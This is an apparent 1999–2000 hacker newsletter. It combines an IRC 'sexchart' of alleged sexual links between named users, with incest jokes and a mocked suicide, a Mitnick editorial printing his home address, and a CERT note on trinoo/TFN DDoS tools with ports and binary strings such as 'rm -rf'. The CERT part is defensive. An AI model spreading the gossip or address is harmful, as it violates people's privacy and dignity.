slander & libel -- the official computer scene sexchart
"that's none of your business!" version 9.04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

for updates, additions, or to be put on the sexchart mailing list, mail
crank@ice.net. to receive the latest version on efnet irc, "/msg lifelike
sexchart". a link is denoted by any sexual action between computer users that
is capable of spreading an std, from wet kissing on up. the last .05 of
revisions is listed at the bottom.

since the chart has grown so much, it's been extended in a strange way. to
preserve the 78 column width, there is now a secondary chart beneath the
first. people whose names appear between asterisks (*) in the first chart
also exist in the second.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[sexchart diagram: the 78-column ASCII line chart linking handles does not
survive with its layout intact and is omitted here]
[remaining rows of the "big loop" ASCII chart; not recoverable from the extracted text]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[secondary chart, branching ASCII art; the link chains that survive extraction:]
hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage | | | Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira | | | fuz B00bz magpie pinguino -- pill maq -- apok0lyps

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

"the big loop" is over 800 people! holy crap! work for the chart.

the top rankings:
----------------
#1 winner -- pinguino & gweeds -- 21 links! it's a tie!
#2 winner -- meenk -- 19 links!
#3 winner -- crank -- 18 links!
#4 winner -- xgirl -- 15 links!
#5 winner -- n0elle & sQurl -- 13 links! it's a tie!

honorable mention:
-----------------
12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix!
11 links: murmur, evol, lust, Mikey, & fuz!
10 links: pip, & tigerbeck!
9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika, & l0ra!

be a winner *today*!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

unconfirmed links: these are links i've been told more than twice to add, but have then been told by others to remove once they're on the chart. each link stays for six months, & if no one can prove it's valid in that time, it is removed & assumed untrue. if you bore witness to one of these links or know someone who did, mail crank@ice.net with your confession!

(no unconfirmed links at this time.)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

notable gross things on the chart: this is a section for easy reference to family members on the chart. the end people are the relation as noted. if you know two people on the big loop are in the same family, mail crank@ice.net & let us rejoice in the incest!

tigerbeck -- aries99                                         1 link: siblings
spirit -- hillary -- seth -- candyrain                       3 links: siblings
pixy -- gweeds -- jess -- andrew -- mswicked                 4 links: siblings
blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie  5 links: siblings
art -- seaya -- kaia -- murmur -- sonia -- plexus            5 links: siblings
potter -- scat -- bF -- evol -- styx                         4 links: cousins
christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept    5 links: stepsiblings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#2600:
lashtal | empress deadguy | maverick | | | | sin ----- speck -- liquid_motion | | beastly -- c4in d_rebel kspiff -- mimes -- dieznyik -- nelli | borys -- zebby (#bodyart) LdyMuriel Erato flutterbi chexbitz `---. | .---' | Kalika -- IceHeart -------------- virago -- mre || | | | Berdiene --'| | Pyra -- Roamer ewheat | `---------.
Serenla --' roach -- satsuki -- spinningmind kitiara -- starlord anarchy -- aphex twin soul seeker -- educated guess tempus thales -- lady in black -- midnight sorrow magnatop -- darice jandor -- alexis ryna illusionx -- thumper javaman -- nrmlgrl

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

bodyart [#bodyart/#bodypiercing/#tattoo]:
ga[r]y | | xindjoo -- grrtigger -- bone-head | | FreAkBoi -- psychoslut -- timo heidikins -- pasquale grub -- gypsie tabaqui -- catbones -- sprite ministry -- SuperMia -- superdave bert37 -- chiot steppah -- creeper syx66 -- gypsy_whore

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#coders:
simon -- wolfie -- raphael (#trax) bolt -- ashli

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#ezines:
sirlance -- holly -- hardcore | rattle -- s4ra -- doommaker phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill | | pixieOpower spiff -- tl109 figglemuffinz -- creed ilsundal -- fairy_princess vanir -- darkland snarfblat -- d1d1 dimes -- bexy -- mindcrime tut -- casey pezmonkey -- cptbovine greyhawk -- crazybaby cheesus -- meowkovich catbutt -- pulse ygraine -- drool bigmike -- shana camel -- icee UberFizzGig -- kniht -- wadsworth

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#hack:
t0c -- seussy -- o0 | taner glyph -- adnama -- weaselboy -- vein -- montell | | m0rticia shamrock -- jennicide -- efpee -- imposter-dh | bellum radikahl -- jazmine -- gitm t3kg -- elfgard pluvius -- lydia panic -- plant -- erikt sl33p -- molldoll allman -- costales rhost -- sue_white serpent -- no_ana vaxbuster -- tiggie -- redragon ajrez -- luminare -- m0jo

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#mindvox:
killarney -- tomwhore -- fairosa -- kids

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

misc:
MsLePew -- Beacher sangfroid -- inspektor foo -- leeny HippieEB -- Imaj
mskathy -- strahd plutonium -- pixiedust cnelson -- vanessa Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss doogie -- sarahlove kirby-wan -- cybergirl lurid -- deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar jaran -- duke chs -- princess ndex -- illusions

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

music [#punk/#ska/#sxe]:
solaris -- kojak -- chelsea -- pieskin -- lady rude | kcskin -- janew | kamaskin -- kimee -- dano joojoo nes | | auralee -- konfuz -- subgurl -- danx -- starla | | kathy21 alee mutata -- skidman shellskin -- amberskin astrophil -- maggiemae skarjerk -- pancreas prick -- taxie -- jubjub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#seattle:
nitefall bgh -- superlime -- Shill -- Lizsac fimble | | | juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb clarita -- dataangel wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- carrianne hamilton -- nurit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#skate:
kindje -- tigerkat -- huphtur -- superzan | punkgirl -- yakuza -- maryjane | caroline -- rhy cosmo cks lodias `--. | .--' outlander -- spike -- lightborn .--'|||`--.
darkelf ||| weevil ||| tenchi --'|`-- h0ly [r] katskate -- earwax vlinder -- miesj superfly -- conchita -- nobaboon -- no_fievel p4nacea -- bakunin herculez -- nicki

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#trax:
cardiac sandman -- trissy skie -- necros | | | saxy -- vegas basehead | | | kiwidog fassassin -- discodiva gblues | squeep -- qporucpine -- ami -- dilvish higherbeing -- ms_saigon -- floss | | howler vizz mellow-d -- kisu -- snowman -- trixi | megz lowrider -- lum -- perisoft mickrip -- astrid -- draggy -- leece pandorra -- malakai ozone -- bliss animix -- pixie lummy -- daedalus frostbitten_dream -- pickl'ette -- redial

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#twilight_zone:
revneptho dtm Frizz0 Wireless `----.| .---' | h0lydirt --- nina -- zbrightmn -- halah .--'| `---. | dog3 | whistler RockShox | chilly joeN -- daysee -- evil_ed -- linnea | munchie Loverman -- Missi redbird -- reddy

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#unix:
in4mer -- devilgrl gerg -- tyger chloe -- cosmos dem -- webb callechan -- rhiannon RealScott -- Ila supertaz -- skye

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

revision history -- last updated 7-28-99

v9.04:
added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather, phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia, banshee, PointBlank, & RaggedyAnne.
added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage, & thepublic to the secondary chart.
(if anyone has an alternate nick for the #gothic Murmur, please mail me. i used the nick Murmur_gth for now.)
added misc gh0st group to the big loop.
gweeds moves up to winner 1.
meenk moves up to winner 2.
gothbitch moves up to honorable mention 12.
renamed Listener to alecks.
renamed illuminaeti to luminare.
renamed zines category to #ezines.
added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines.
added amanda -- unrelated -- effy -- BigDaddyBill to #ezines.
added jennicide -- bellum to #hack.
added luminare -- ajrez to #hack.
added to misc:
  deb -- bmbr
  j-dog -- a_kitten
  Fenchurch -- Becca
  captain_zap -- ms_infowar
  deb -- lurid
  jaran -- duke
  chs -- princess
  ndex -- illusions
removed one outdated "unconfirmed link".
removed miasma -- six from unconfirmed. oops.
removed bogus links:
  t -- gf -- lilfeet
  Quarex -- keroppi
new links:
  fizzgig -- (solomon, Asmodeus, fishie, belial)
  Grue -- gothbitch -- Asmodeus
  gothbitch -- belial -- Uadjit
  METchiCK -- (f_fisher, grimmy, deadapril, supervixn)
  kel -- (disorder, lizzie, gh0st)
  corp -- gweeds -- magpie
  aex -- Murmur_gth
  eppie -- bix
  styx -- DJTrax
  meenk -- hydro311
  halfman -- sumogirl
  disorder -- kamira -- apok0lyps -- maq -- Heather -- montel
  el_jefe -- (Mika, phen, Heather)
  daud -- monachus
  amos -- velcro
  Schquimpy -- (trilobyte, EddieV, Nex)
  splat -- phreaky
  Sylvie -- neko -- Katia
  shipley -- banshee
  thepublic -- rage
  hylonome -- PointBlank -- RaggedyAnne
  hylonome -- RaggedyAnne -- Quarex

v9.03:
added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars, wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham, Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar, E_D, Fiore, MartYr, & Stipen.
added angieb to the secondary chart.
updated number of people in the big loop.
gweeds moves up to winner 2.
meenk moves up to winner 3.
gothbitch moves up to honorable mention 9.
added miasma -- six to unconfirmed.
added zines The_Sock group to the big loop.
added zines AnonGirl group to the big loop.
added javaman -- nrmlgrl to #2600.
added satsuki -- (IceHeart, roach, spinningmind) to #2600.
added doogie -- sarahlove to misc.
added kirby-wan -- cybergirl to misc.
added shane -- aeriona to #seattle.
added to #trax:
  skie -- necros
  astrid -- draggy
  ms_saigon -- vizz
  snowman -- megz
removed bogus links:
  mailart -- konfuz (mailart = nes)
new links:
  DH -- Gemni -- DrMonk
  meenk -- AK47
  gweeds -- angieb
  AIDS -- caitlin
  deadgirl -- Mali -- maq
  logicbox -- monkeygrl
  Fiore -- gothbitch -- Miah
  grlfrmars -- (mogel, wildcard, spectacle, kev-man)
  turtlegrl -- bile
  trilobyte -- chinagirl
  fizzgig -- rubella
  anubis -- Arkham
  swisspope -- AnonGirl
  pahroza -- Uadjit -- solomon -- moomin13 -- Grue
  Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa
  Mottyl -- (solomon, Kalannar, E_D)
  MartYr -- Fiore -- Stipen

v9.02:
added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV, Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre, freqout, krnl, skatin, Sinja, Frobozz, & hawk.
gweeds moves up to winner 2.
meenk moves up to winner 3.
sQurl moves up to winner 6.
metalchic moves up to honorable mention 9.
renamed cannianne to carrianne.
added to misc:
  Hawkerly --- MeaNKaT --- Morpheus
  Vega1 -- Serena
  DIPTY_DO -- Trish_ -- hellsnake
  Grace^ -- Gusto -- puckie
  notyou -- jennyh
  Skada -- icee_bin -- eriss
(special note: eriss was dumped for Skada & subsequently leapt to her death from a nineteenth story window. neat!)
added to #zines:
  nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^
  meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA
  MrJuGGaLo -- METchiCK -- facedown
  caitlin --- wmmr --- coffeegrl
  AnonGirl -- Medusa -- PrimeX -- Juliette
removed bogus links:
  emmie -- (netik, msk, Herodotus)
  billn -- Tay -- retrospek
  mayfair -- outside
  Mali -- (Asmodeus, pahroza, Uhlume, Imperia)
new links:
  emmie -- rebrane -- JelloMold
  Xaotika -- lethar -- valeriee
  mayfair -- neologic
  trilobyte -- amos -- EddieV -- sonia
  sQurl -- Roadruner
  Tay -- TAYL0R HAWKINS -- MINNIE DRIVER
  anubis -- secretboy
  netmask -- kel
  meenk -- nevre
  gweeds -- freqout
  missx -- krnl
  metalchic -- skatin
  Imperia -- Asmodeus -- Sinja
  turtlgrl -- pahroza -- gothbitch -- Mali -- lethar
  fizzgig -- msk
  gothbitch -- Frobozz
  darwin -- hawk

v9.01:
added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca, twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox.
added tigerbeck & bifrost to the secondary chart.
updated number of people in the big loop.
new "gross link": tigerbeck -- aries99 (1: siblings)
gweeds moves up to winner 3.
tigerbeck moves up to honorable mention 10.
added FreAkBoi -- psychoslut -- timo to #bodyart.
added supertaz -- skye to #unix.
removed one outdated "unconfirmed link".
removed bogus links:
  juliet -- readwerd
  FreAkBoi -- ga[r]y (#bodyart)
  Briana -- homeysan
new links:
  seaya -- tamago
  _Melody_ -- atticus
  DrkSphere -- lilindian
  tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp)
  tigerbeck -- (allira, twichykat, spacegirl, bifrost)
  gweeds -- mysl
  msk -- DangerJen -- Astaroth
  outside -- mayfair
  netik -- fizzgig
  emmie -- lethar
  pahroza -- anubis
  aex -- inox

v9.00:
i was going to do something special for 9.00, but there just isn't anything to do. would you people be interested in sexchart tshirts? mail crank@ice.net.
note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be sure to update your links.
added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus, Herodotus, & Asmodeus.
added am0eba, & spyder_bytes to the secondary chart.
added netik & Mali sections to the big loop.
added new section: #seattle.
moved e1mo links to #seattle.
moved koosh -- tcb to #seattle.
moved clarita -- dataangel to #seattle.
added chexbitz -- virago -- ewheat to #2600.
added Astaroth -- DangerJen to #gothic.
added plutonium -- pixiedust to misc.
added cnelson -- vanessa to misc.
added to #seattle:
  wyclef -- NessaLee
  Drmc -- Jill-
  SisSoul -- Matt
  Dawgie -- Jenay
  jsk -- ames
  Liz -- jkowall
  bgh -- superlime -- Shill -- Lizsac
  fimble -- koosh -- Justnsane -- aeriona -- superlime
  kurgan -- babygrrl
  Mcbeth -- BeccaBoo
  djinn -- ruthe
  wankle -- cannianne
  hamilton -- nurit
added halah -- Wireless to #twilight_zone.
removed one outdated "unconfirmed link".
removed bogus links:
  e1mo -- chris22 (#seattle)
  loki -- am0eba -- sledge
  missx -- (sledge, erikb, ice9)
  Briana -- nebulizr
  logicbox -- skully
  murcurochrome -- jazmine -- deadkat (#hack)
new links:
  am0eba -- spyder_bytes
  Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal)
  teletype -- vlaad
  netik -- msk -- emmie -- outside
  aex -- bifrost -- emmie -- netik
  emmie -- Herodotus
  bifrost -- turtlgrl
  Imperia -- msk
  Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza)

@HWA

05.0 Peer finally arrested after over a decade of connection resetting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.ircnews.com/

(Humour, in case you didn't know: a common connection error is "connection reset by peer", caused by errors in the network and on occasion a DoS attack on your IRC connection... ;) - Ed)

Peer Arrested, Charged With Resetting Connections

SEATTLE, WA - An exhaustive eight month cyberhunt ended shortly before dawn on January 14th, 2000, as FBI agents and Washington State Troopers apprehended the elusive chatroom terrorist known only as Peer.
The IRC menace was brought to justice after a decade-long connection resetting spree that plagued chatters around the globe. FBI officials said the number of reset connections numbered in the "millions". Connections being reset by peer were the number one cause of interrupted chat sessions on all major IRC networks in 1999.

Undernet ChanServ Committee member Morrissey told IRCNews.com, "What set peer apart was the element of surprise. With ping, you kinda knew you were gonna time out. You could tell. Peer totally got you out of nowhere."

Leland, another bigshot on the Undernet IRC network, praised the FBI for their work, "How many idle times must be ruined? How many cybersex sessions must be cut short before we put an end to Peer and his shenanigans?"

Peer's lawyers criticized Leland's use of the word "shenanigans". Peer's lead defence attorney responded, "Really, I think we can come up with a better term than that. We're all adults here. Besides, it's 'alleged' shenanigans."

Federal Prosecutor Sarah Evans told IRCNews.com she intends to "throw the book" at Peer. If convicted on all counts, Peer could spend up to the next three years on probation. "His ass is mine," claimed a motivated Evans. "With any luck, we'll get that judge who handled the Mitnick case."
@HWA

06.0 Updated proxies list from IRC4all
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.lightspeed.de/irc4all/

Socks 4 proxies:
~~~~~~~~~~~~~~~~

Socks 5 proxies
~~~~~~~~~~~~~~~

Wingates
~~~~~~~~

Other proxies available, check the site for more/updated lists.

@HWA

07.0 Rant: Mitnick to go wireless?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Editorial, by Cruciphux Jan 23rd 2000

Finally the long awaited release of ueber hacker Kevin Mitnick has arrived; he was released Friday Jan.
21st in the morning and is not allowed to touch computers or cellular phones for a period of three years without express permission of his probation officer. Kevin holds out one hope though: earlier in his 'career' Kevin was an avid amateur radio operator, and his license recently expired; he is reportedly scrambling to obtain a new one. This poses some very interesting questions: will he be allowed to operate his HAM equipment?

Packet Radio

For those not in the know, myself and several HWA members are also HAM operators; most of us got hooked by the prospect of a technology called "packet radio". The internet runs on a protocol known as X.25; packet radio uses a similar methodology known as AX.25, the "A" denoting "A"mateur. We're some of the few people that have actually IRC'ed using a packet radio link to a unix server over the 2m band, but of course this requires a computer and additional computer equipment hooked to the radio gear necessary to run packet. What if we forget all that, since it is out of Kevin's reach to own a computer at this time, and look at what other 'trouble' he can get into?

Repeater Nets and the Autopatch

The radios of choice these days among young hams are dual band HT's (short for handy-talky or 'walkie-talkie'); these will usually cover the 2m band and the 440 cm bands. The 2m band by itself is the most common band in use and operates a great deal using repeaters. A repeater can be compared to a cell site insomuch as it takes a weak signal (the HT, generally 100mw to 4 watts in power, much like small cell phones) and REPEATS or re-broadcasts on another (close) frequency a stronger signal, thus reaching greater range. With special DTMF codes it is possible to LINK repeaters and talk across the country using repeater nets. What's so great about this? Apart from the obvious ability to talk to people long distances for little to no cost, many repeaters have the magic box known as an AUTOPATCH.
The autopatch is a computer interface at the repeater site that interfaces your radio signals with a TELCO line. (aha!) Yes, many hams enjoy the privileges (minus obvious privacy and anonymity) of 'cellular' or 'radio phone' usage for minimal cost. For a GOOD radio you are looking at an investment around $500, and for a HAM club membership (to get all the repeater and autopatch codes etc) you're looking at around $15/year, or you can find the codes posted in many places on the web.

Caveats / privacy

The airwaves are 'public property' and as such are regulated (for our own good of course) by big brother, that being the FCC in the U.S.A or DOC in Canada. When you pass your licensing test (minimal proficiency in electronics and general radio theory must be demonstrated via written test) you will be assigned a unique CALL SIGN (in some places you can request a custom/vanity sequence but will be allocated a random unused call if your request is already in use). Since the airwaves are public property, so are the records of those users that are licensed to broadcast on them. Several online databases exist or can be purchased cheaply on CDROM with many search features like search by name, call, address, partials etc... In this case a simple search on the QRZ website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns several possible matches, among them the correct one, which is listed below.

--------------------------------------------------------------------------
Callbook Data for N6NHG

The following information is taken from the March 1993 QRZ Ham Radio Callsign Database. This is not the current information for this callsign. Click on the underlined callsign to see the latest information for this record.
Callsign:   N6NHG
Class:      General
Name:       KEVIN D MITNICK
Effective:  12 Dec 1989
Expires:    12 Dec 1999
Address:    14744 LEADWELL ST
City/State: VAN NUYS CA 91405
--------------------------------------------------------------------------

We can safely assume this is correct since the initials (KDM) are right and the location matches up, along with the license renewal date of 12/12/99.

Shenanigans

How does Kevin fit into all this? Well, as you can see, it is possible to interface the radio with computer equipment and also manipulate outside phone lines using ham radios. A recurring problem in these parts was pirate operators making bogus 911 calls using the local CN Tower's (then public or 'open') autopatch - it now requires a code and a subaudible PL tone. This actually closed down the repeater site for some time and caused unknown harassing traffic to the 911 operators fielding the bogus calls. The pirate is not totally safe however. Much like Kevin was apprehended by Tsutomu through lax use of his cellphone and some radio direction finding (RDF) gear, so can the 2m pirate be tracked through RDF triangulation; several grass roots groups do nothing but track down pirate signals or, sometimes for competition, randomly placed signals, in what is known as the 'Fox Hunt'. But this requires lots of manpower and the willingness to get out there and help do some tracking.

Epilogue

I truly hope Kevin is allowed to get back into one of his lifetime loves, but he may find that there are too many caveats with new features and computer integration into the repeater systems; mailboxes and the like are commonplace on repeaters, and so are email gateways, so it is conceivable that one could inadvertently get into trouble through the grey lines of technology.... Meanwhile, all the best to Kevin and his family, and hopefully you learned a little bit about amateur radio's offerings along the way. Peace out.

Cruciphux
cruciphux@dok.org
Editor HWA.hax0r.news newsletter.
http://welcome.to/HWA.hax0r.news/

Further reading:

http://www.arrl.org      - The main site of the American Radio Relay League
http://www.qrz.com/      - If you know the callsign of the operator, his details are published publicly in a database which can be searched online here. Also contains other info and links.
http://www.freekevin.com/ - You know, like more info than you need on KDM.

@HWA

08.0 Distributed Attacks on the rise. TFN and Trinoo.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CMP Techweb: http://www.techweb.com/wire/story/TWB19991130S0010

Intruders Get Under A Network's Skin
(11/30/99, 5:40 p.m. ET)
By Rutrell Yasin, InternetWeek

A rise in rogue distributed denial of service tools being installed on networks by intruders has prompted the Computer Emergency Response Team (CERT) Coordination Center to help companies thwart the large coordinated packet flooding attacks.

CERT, a watchdog organization, has issued an advisory on two tools--trinoo and Tribe Flood Network (TFN)--after receiving reports from organizations affected by the tools. The tools "appear to be undergoing active development, testing, and deployment on the Internet," according to a CERT incident note.

So far, the tools have been installed on thousands of servers or workstations in about 100 enterprise sites, said Kevin Houle, CERT's incident response team leader.

While the type of packet flooding attack the tools generate is not new, the scope of the attacks can have a devastating impact on an enterprise network, industry experts and IT managers agreed.

Both trinoo and TFN enable an intruder to launch coordinated attacks from many sources against one or more targets. In essence, the tools use bandwidth from multiple systems on diverse networks to generate potent attacks. The tools "can generate very large denial of service attacks that consume as much as one gigabyte of data per second," said Houle.
To put that in perspective: rather than using one BB gun to hit a target, a hacker now has the equivalent of 1,000 BB guns, Houle said. Or the effect can be more like a shotgun, said Mike Hagger, vice president of security at Oppenheimer Funds. These tools can "be deadly and can bring a company to its knees in a matter of seconds," Hagger said.

These rogue distributed tools are usually installed on host servers that have been compromised by exploiting known security holes, such as various Remote Procedure Call (RPC) vulnerabilities, according to CERT.

Trinoo is used to launch coordinated UDP flood attacks from many sources. A trinoo network consists of a small number of servers and a large number of clients. To initiate an attack, an intruder connects to a trinoo server and instructs it to launch an attack against one or more IP addresses. The trinoo server then communicates with the clients, giving them instructions to attack one or more IP addresses for a specified period of time, CERT said.

In addition to UDP flood attacks, TFN can generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast (smurf) attacks. The tool can generate packets with spoofed source IP addresses. To launch an attack with TFN, an intruder instructs a client or server program to send attack instructions to a list of TFN servers or clients.

In its alert, CERT has issued a number of steps IT managers can take to thwart distributed denial of service attacks. To prevent installation of distributed attack tools on networked systems, users should stay up to date with security patches to operating systems and application software. IT managers should also continuously monitor their networks for signatures of distributed attack tools. For example, if a company uses intrusion detection systems, IT should tune them to recognize signs of trinoo or TFN activity.
Since a site under attack may be unable to communicate via the Internet during an attack, security policies should include "out of band communications with upstream network operators or emergency response teams," CERT advised.

@HWA

CERT Advisory: http://www.cert.org/incident_notes/IN-99-07.html

CERT® Incident Note IN-99-07

The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community.

Distributed Denial of Service Tools

Updated: December 8, 1999 (added DSIT Workshop paper and IN-99-05)
Thursday, November 18, 1999

Overview

We have received reports of intruders installing distributed denial of service tools. Tools we have encountered utilize distributed technology to create large networks of hosts capable of launching large coordinated packet flooding denial of service attacks.

We have seen distributed tools installed on hosts that have been compromised due to exploitation of known vulnerabilities. In particular, we have seen vulnerabilities in various RPC services exploited. For more information see the following CERT Incident Notes:

   IN-99-04, Similar Attacks Using Various RPC Services
   IN-99-05, Systems Compromised Through a Vulnerability in am-utils

Two of the tools we have seen are known as trinoo (or trin00) and tribe flood network (or TFN). These tools appear to be undergoing active development, testing, and deployment on the Internet.

Descriptions

   Trinoo
   Tribe Flood Network

Trinoo

Trinoo is a distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. For more information about various UDP flood attacks, please see CERT Advisory CA-96.01.

A trinoo network consists of a small number of servers, or masters, and a large number of clients, or daemons. A denial of service attack utilizing a trinoo network is carried out by an intruder connecting to a trinoo master and instructing that master to launch a denial of service attack against one or more IP addresses.
The trinoo master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time.

   1. intruder -------> master;  destination port 27665/tcp
   2. master   -------> daemons; destination port 27444/udp
   3. daemons  -------> UDP flood to target with randomized destination ports

The binary for the trinoo daemon contains IP addresses for one or more trinoo masters. When the trinoo daemon is executed, the daemon announces its availability by sending a UDP packet containing the string "*HELLO*" to its programmed trinoo master IP addresses.

   daemon -------> masters; destination port 31335/udp

The trinoo master stores a list of known daemons in an encrypted file named "..." in the same directory as the master binary. The trinoo master can be instructed to send a broadcast request to all known daemons to confirm availability. Daemons receiving the broadcast respond to the master with a UDP packet containing the string "PONG".

   1. intruder -------> master;  destination port 27665/tcp
   2. master   -------> daemons; destination port 27444/udp
   3. daemons  -------> master;  destination port 31335/udp

All communications to the master on port 27665/tcp require a password, which is stored in the daemon binary in encrypted form. All communications with the daemon on port 27444/udp require the UDP packet to contain the string "l44" (that's a lowercase L, not a one).

The source IP addresses of the packets in a trinoo-generated UDP flood attack are not spoofed in versions of the tool we have seen. Future versions of the tool could implement IP source address spoofing. Regardless, a trinoo-generated denial of service attack will most likely appear to come from a large number of different source addresses.
We have seen trinoo daemons installed under a variety of different names, but most commonly as

   ns
   http
   rpc.trinoo
   rpc.listen
   trinix
   rpc.irix
   irix

Running strings against the daemon and master binaries produces output similar to this (we have replaced master IP address references in the daemon binary with X.X.X.X). The two columns are the daemon's strings and the master's strings respectively:

   trinoo daemon          trinoo master

   socket                 ---v
   bind                   v1.07d2+f3+c
   recvfrom               trinoo %s
   %s %s %s               l44adsl
   aIf3YWfOhw.V.          sock
   PONG                   0nm1VNMXqRMyM
   *HELLO*                15:08:41
   X.X.X.X                Aug 16 1999
   X.X.X.X                trinoo %s [%s:%s]
   X.X.X.X                bind
                          read
                          *HELLO*

   ... rest omitted ...

Tribe Flood Network

TFN, much like trinoo, is a distributed tool used to launch coordinated denial of service attacks from many sources against one or more targets. In addition to being able to generate UDP flood attacks, a TFN network can also generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast (e.g., smurf) denial of service attacks. TFN has the capability to generate packets with spoofed source IP addresses. Please see the following CERT Advisories for more information about these types of denial of service attacks.

   CA-96.21, TCP SYN Flooding and IP Spoofing Attacks
   CA-98.01, "smurf" IP Denial of Service Attacks

A denial of service attack utilizing a TFN network is carried out by an intruder instructing a client, or master, program to send attack instructions to a list of TFN servers, or daemons. The daemons then generate the specified type of denial of service attack against one or more target IP addresses. Source IP addresses and source ports can be randomized, and packet sizes can be altered.

A TFN master is executed from the command line to send commands to TFN daemons. The master communicates with the daemons using ICMP echo reply packets with 16 bit binary values embedded in the ID field, and any arguments embedded in the data portion of the packet. The binary values, which are definable at compile time, represent the various instructions sent between TFN masters and daemons.
Use of the TFN master requires an intruder-supplied list of IP addresses for the daemons. Some reports indicate recent versions of TFN master may use blowfish encryption to conceal the list of daemon IP addresses. Reports also indicate that TFN may have remote file copy (e.g., rcp) functionality, perhaps for use in automated deployment of new TFN daemons and/or software version updating in existing TFN networks.

We have seen TFN daemons installed on systems using the filename td. Running strings on the TFN daemon binary produces output similar to this.

   %d.%d.%d.%d
   ICMP
   Error sending syn packet.
   tc: unknown host
   3.3.3.3
   mservers
   randomsucks
   skillz
   rm -rf %s
   ttymon
   rcp %s@%s:sol.bin %s
   nohup ./%s
   X.X.X.X
   X.X.X.X
   lpsched
   sicken
   in.telne

Solutions

Distributed attack tools leverage bandwidth from multiple systems on diverse networks to produce very potent denial of service attacks. To a victim, an attack may appear to come from many different source addresses, whether or not IP source address spoofing is employed by the attacker. Responding to a distributed attack requires a high degree of communication between Internet sites. Prevention is not straightforward because of the interdependency of site security on the Internet; the tools are typically installed on compromised systems that are outside of the administrative control of eventual denial of service attack targets.

There are some basic suggestions we can make regarding distributed denial of service attacks:

Prevent installation of distributed attack tools on your systems

   Remain current with security-related patches to operating systems and applications software.
   Follow security best practices when administering networks and systems.
Prevent origination of IP packets with spoofed source addresses

   For a discussion of network ingress filtering, refer to RFC 2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing.

Monitor your network for signatures of distributed attack tools

   Sites using intrusion detection systems (e.g., IDS) may wish to establish patterns to look for that might indicate trinoo or TFN activity based on the communications between master and daemon portions of the tools.
   Sites that use proactive network scanning may wish to include tests for installed daemons and/or masters when scanning systems on their network.

If you find a distributed attack tool on your systems

   It is important to determine the role of the tools installed on your system. The piece you find may provide information that is useful in locating and disabling other parts of distributed attack networks. We encourage you to identify and contact other sites involved.

